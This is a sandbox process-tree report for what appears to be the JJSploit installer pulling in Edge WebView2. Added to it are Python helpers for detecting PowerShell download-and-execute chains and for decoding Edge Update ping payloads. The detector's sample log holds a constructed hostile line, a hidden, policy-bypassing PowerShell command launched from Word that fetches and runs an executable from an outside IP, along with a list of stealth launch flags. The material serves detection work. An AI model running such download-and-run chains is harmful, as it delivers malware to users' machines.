C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4952,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1928 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4588,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=4388 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1140 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\net.wearedevs\EBWebView" --webview-exe-name=JJSploit.exe --webview-exe-version=8.10.8 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=4232,i,1390419007366082302,17303229957542763952,262144 --disable-features=msPdfOOUI,msSmartScreenProtection,msWebOOUI --variations-seed-version --mojo-platform-channel-handle=4904 /prefetch:85⤵
- Executes dropped EXE
PID:2840 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:1932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -windowstyle hidden try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 } catch {}; Invoke-WebRequest -Uri "https://go.microsoft.com/fwlink/p/?LinkId=2124703" -OutFile "$env:TEMP\MicrosoftEdgeWebview2Setup.exe" ; Start-Process -FilePath "$env:TEMP\MicrosoftEdgeWebview2Setup.exe" -ArgumentList ('/silent', '/install') -Wait2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe"C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe" /silent /install3⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Program Files (x86)\Microsoft\Temp\EU2304.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU2304.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"4⤵
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2608 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:440 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3672 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:944 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMjUiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTMxNEMwNzctRTY4Mi00NENFLTkwREMtRTRCNkUyQzJEQjBBfSIgdXNlcmlkPSJ7MUIzNTJEQzktRTM5RC00MEI5LUFENDktRjIxOTI4REZCNUQwfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins0QzM4OTQyQi1BNDY5LTRCRDctQTQ1RC00MDZCNEIyNTA2REZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNDcuMzciIG5leHR2ZXJzaW9uPSIxLjMuMTk1LjI1IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MTQwMzEwNTM4IiBpbnN0YWxsX3RpbWVfbXM9IjQzOCIvPjwvYXBwPjwvcmVxdWVzdD45⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2712 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{A314C077-E682-44CE-90DC-E4B6E2C2DB0A}" /silent5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3696
-
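The PowerShell step at PID 3780 (depth 2 above) is what the "Blocklisted process makes network request" signature refers to: it fetches https://go.microsoft.com/fwlink/p/?LinkId=2124703, which is Microsoft's WebView2 Evergreen bootstrapper link, writes the file to %TEMP% and immediately starts it with /silent /install. The rest of that subtree (MicrosoftEdgeWebview2Setup.exe, then the MicrosoftEdgeUpdate.exe copies) is the bootstrapper installing the runtime. Structurally, though, it is a download-and-execute chain launched with -NoProfile and a hidden window, and a detection should key on the chain rather than on the host name, then verify the dropped file's signature. The helper below is an added example, not part of the sandbox report: it extracts that chain from process-creation logs. The log layout (tab-separated pid, parent image, image, command line), the msiexec.exe parent for PID 3780 and the third, hostile-looking line with a TEST-NET-2 address are constructed for illustration; only the PID 3780 command line is copied from the report.

```python
"""Pull PowerShell download-and-execute chains out of process-creation logs.

Added example for the report above; not part of the sandbox output.
Assumed log layout, one process per line:
    pid <TAB> parent image <TAB> image <TAB> command line
"""
import re
from typing import Dict, List
from urllib.parse import urlparse

URL_RE = re.compile(r'https?://[^\s"\'<>)]+', re.IGNORECASE)
OUTFILE_RE = re.compile(r'-OutFile\s+"?([^"\s;]+)"?', re.IGNORECASE)
START_RE = re.compile(r'Start-Process\s+(?:-FilePath\s+)?"?([^"\s;]+)"?', re.IGNORECASE)
# Launch switches that hide the run from the user; each is scored once.
QUIET_FLAGS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "no_profile": r"-nop(?:rofile)?\b",
    "non_interactive": r"-noni(?:nteractive)?\b",
    "bypass_policy": r"-e(?:xecutionpolicy|p)\s+bypass",
    "encoded_command": r"-e(?:nc|ncodedcommand|c)\b",
}


def norm_path(p: str) -> str:
    """Case-fold and unquote so the same $env:TEMP path written twice compares equal."""
    return p.strip().strip("\"'").lower()


def analyse(cmdline: str) -> Dict:
    """Describe what one PowerShell command line downloads, drops and executes."""
    dropped = {norm_path(p) for p in OUTFILE_RE.findall(cmdline)}
    executed = {norm_path(p) for p in START_RE.findall(cmdline)}
    urls = URL_RE.findall(cmdline)
    return {
        "urls": urls,
        "hosts": [urlparse(u).hostname or "" for u in urls],
        "dropped": sorted(dropped),
        "executed": sorted(executed),
        "quiet_flags": [name for name, rx in QUIET_FLAGS.items()
                        if re.search(rx, cmdline, re.IGNORECASE)],
        # The chain that matters: a file fetched by this command is started by it.
        "download_exec_chain": bool(dropped & executed),
    }


def triage(log_lines: List[str]) -> List[Dict]:
    """Return one finding per PowerShell process that downloads and then runs a file."""
    findings = []
    for line in log_lines:
        pid, parent, image, cmdline = line.split("\t", 3)
        if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        info = analyse(cmdline)
        if info["download_exec_chain"]:
            findings.append({"pid": int(pid), "parent": parent, **info})
    return findings


# Command line of PID 3780 as shown in the report. The parent image is an
# assumption: the step runs at depth 2 under the MSI install, i.e. msiexec.exe.
REPORT_PS_CMDLINE = (
    r'powershell.exe -NoProfile -windowstyle hidden try { [Net.ServicePointManager]::SecurityProtocol'
    r' = [Net.SecurityProtocolType]::Tls12 } catch {}; Invoke-WebRequest -Uri'
    r' "https://go.microsoft.com/fwlink/p/?LinkId=2124703" -OutFile "$env:TEMP\MicrosoftEdgeWebview2Setup.exe"'
    r''' ; Start-Process -FilePath "$env:TEMP\MicrosoftEdgeWebview2Setup.exe" -ArgumentList ('/silent', '/install') -Wait'''
)

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed log: the report's line, a benign PowerShell run, and a made-up
# chain from a TEST-NET-2 address to show the same logic on hostile input.
SAMPLE_LOG = [
    "\t".join(["3780", "msiexec.exe", PS_IMAGE, REPORT_PS_CMDLINE]),
    "\t".join(["4100", "explorer.exe", PS_IMAGE, "powershell Get-Process | Sort-Object CPU"]),
    "\t".join(["5200", "WINWORD.EXE", PS_IMAGE,
               r"powershell -w hidden -ep bypass iwr http://198.51.100.7/x.exe"
               r" -OutFile C:\Users\Public\x.exe; Start-Process C:\Users\Public\x.exe"]),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["pid"], f["parent"], f["hosts"], f["dropped"], f["quiet_flags"])
```

Map Sysmon Event ID 1 or EDR process events into the four-field layout and feed the lines to triage(). A finding whose hosts list is only go.microsoft.com and whose dropped file carries a valid Microsoft Authenticode signature matches this installer's behaviour; a chain with any other host, or an unsigned drop, is the one to chase.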
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3320
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping 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-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUxNDY0MDQ1MTciLz48L2FwcD48L3JlcXVlc3Q-2⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4380 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\MicrosoftEdge_X64_130.0.2849.52.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\MicrosoftEdge_X64_130.0.2849.52.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\EDGEMITMP_0CD2B.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\EDGEMITMP_0CD2B.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\MicrosoftEdge_X64_130.0.2849.52.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level3⤵
- Checks computer location settings
- Drops file in Program Files directory
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\EDGEMITMP_0CD2B.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\EDGEMITMP_0CD2B.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=130.0.6723.59 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2A29E0E1-7B0C-4D6D-9AC9-690CB84BE997}\EDGEMITMP_0CD2B.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=130.0.2849.52 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff7fa8ed730,0x7ff7fa8ed73c,0x7ff7fa8ed7484⤵
- Executes dropped EXE
PID:2736 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMjUiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTMxNEMwNzctRTY4Mi00NENFLTkwREMtRTRCNkUyQzJEQjBBfSIgdXNlcmlkPSJ7MUIzNTJEQzktRTM5RC00MEI5LUFENDktRjIxOTI4REZCNUQwfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntFRUZFNjg5MS1GREMwLTRCNkItQjQwMy00MEZDNEM0QjFEODd9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMwLjAuMjg0OS41MiIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9Ii0xIiBpbnN0YWxsZGF0ZT0iLTEiPjx1cGRhdGVjaGVjay8-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_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-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzU3IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3MDk3NDk4OTMwIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iODc1IiBkb3dubG9hZF90aW1lX21zPSIxMzEzOTEiIGRvd25sb2FkZWQ9IjE3NDkyNTkwNCIgdG90YWw9IjE3NDkyNTkwNCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNjA4MjkiLz48L2FwcD48L3JlcXVlc3Q-2⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Modifies data under HKEY_USERS
PID:3220
-
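Every MicrosoftEdgeUpdate.exe /ping line above carries one argument: an Omaha update-protocol request, base64-encoded with the URL-safe alphabet (RFC 4648 section 5, '-' and '_' in place of '+' and '/') and with the '=' padding stripped, which is why those strings contain '-' and '_' and never end in '='. A standard base64 decoder either rejects them or silently discards those characters. The decoder below is an added example, not part of the report or of Edge Update; it restores the padding, decodes, and summarises the request. The sample payload is constructed to mirror the request/hw/os/app/event layout of the report's pings and reuses the WebView2 appid, updater version and target version shown in the tree, with placeholder session and user GUIDs.

```python
"""Decode the /ping argument that MicrosoftEdgeUpdate.exe passes to itself.

Added example; not part of the report or of Edge Update. The argument is an
Omaha protocol 3.0 request encoded as unpadded URL-safe base64.
"""
import base64
import binascii
import xml.etree.ElementTree as ET
from typing import Dict


def _repad(arg: str) -> str:
    """Base64 needs a length that is a multiple of 4; the updater strips the '='."""
    return arg + "=" * (-len(arg) % 4)


def decode_ping_arg(arg: str) -> str:
    """Restore padding, then decode with the URL-safe alphabet."""
    return base64.urlsafe_b64decode(_repad(arg)).decode("utf-8")


def standard_decoder_breaks(arg: str) -> bool:
    """True when plain base64 would not reproduce the payload.

    base64.b64decode() discards characters outside its alphabet by default,
    so every '-' or '_' is dropped and the result is a padding error or
    shifted garbage rather than the XML.
    """
    try:
        return base64.b64decode(_repad(arg)) != base64.urlsafe_b64decode(_repad(arg))
    except (binascii.Error, ValueError):
        return True


def summarise(xml_text: str) -> Dict:
    """Pull the fields an analyst cares about out of an Omaha request."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    if root.tag != "request":
        raise ValueError("not an Omaha request: <%s>" % root.tag)
    os_el = root.find("os")
    out = {
        "updater": root.get("updater"),
        "updaterversion": root.get("updaterversion"),
        "ismachine": root.get("ismachine") == "1",      # system-level install
        "sessionid": root.get("sessionid"),            # ties one install's pings together
        "userid": root.get("userid"),                  # persistent identifier
        "installsource": root.get("installsource"),
        "os": dict(os_el.attrib) if os_el is not None else {},
        "apps": [],
    }
    for app in root.findall("app"):
        out["apps"].append({
            "appid": app.get("appid"),
            "version": app.get("version"),
            "nextversion": app.get("nextversion"),
            "updatecheck": app.find("updatecheck") is not None,
            # (eventtype, eventresult, errorcode); in Omaha's event table
            # eventtype 2 is install complete, 3 update complete, eventresult 1 success.
            "events": [(e.get("eventtype"), e.get("eventresult"), e.get("errorcode"))
                       for e in app.findall("event")],
        })
    return out


# Constructed payload in the layout of the report's /ping lines. The appid is
# the WebView2 Runtime GUID from the /handoff line, the versions are the ones
# shown in the tree; session and user GUIDs are placeholders.
SAMPLE_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<request protocol="3.0" updater="Omaha" updaterversion="1.3.195.25" ismachine="1"'
    ' sessionid="{00000000-0000-4000-8000-000000000001}"'
    ' userid="{00000000-0000-4000-8000-000000000002}"'
    ' installsource="otherinstallcmd" dedup="cr" domainjoined="0">'
    '<hw logical_cpus="8" physmemory="8"/>'
    '<os platform="win" version="10.0.19041" arch="x64"/>'
    '<app appid="{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}" version="" nextversion="130.0.2849.52">'
    '<updatecheck/><event eventtype="2" eventresult="1" errorcode="0"/>'
    '</app></request>'
)
SAMPLE_PING_ARG = base64.urlsafe_b64encode(SAMPLE_XML.encode("utf-8")).decode("ascii").rstrip("=")

if __name__ == "__main__":
    print(summarise(decode_ping_arg(SAMPLE_PING_ARG)))
```

Run decode_ping_arg() on the argument copied from a process log or from the tree above. The sessionid groups the /handoff, /svc and /ping launches of one install, the userid persists across sessions, and the app elements tell you which product GUIDs the updater is reporting on and what it did (install, update check, event result).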
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4940
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5160
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler1⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5644
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5152 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{75C20470-CFD8-4174-9D3B-71F5A1C4A15A}\MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{75C20470-CFD8-4174-9D3B-71F5A1C4A15A}\MicrosoftEdgeUpdateSetup_X86_1.3.195.27.exe" /update /sessionid "{B184DA84-C1C0-4FFE-A4B8-33B0D50489F0}"2⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5600 -
C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU5F2A.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{B184DA84-C1C0-4FFE-A4B8-33B0D50489F0}"3⤵
- Event Triggered Execution: Image File Execution Options Injection
- Checks system information in the registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5460 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5496 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4928 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:1940 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Modifies registry class
PID:4944 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.27\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Modifies registry class
PID:4624 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping 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-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xOTUuMjUiIG5leHR2ZXJzaW9uPSIxLjMuMTk1LjI3IiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMCIgaW5zdGFsbGRhdGV0aW1lPSIxNzI5NzAyMzI5Ij48ZXZlbnQgZXZlbnR0eXBlPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI4NTYzNDgyOTE3Ii8-PC9hcHA-PC9yZXF1ZXN0Pg4⤵
- Checks system information in the registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:5896 -
